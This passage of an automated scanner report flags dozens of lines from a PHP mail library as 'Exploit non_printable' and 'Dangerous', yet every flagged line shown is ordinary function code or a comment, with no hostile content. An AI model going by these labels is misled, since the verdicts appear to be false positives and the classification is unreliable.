<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
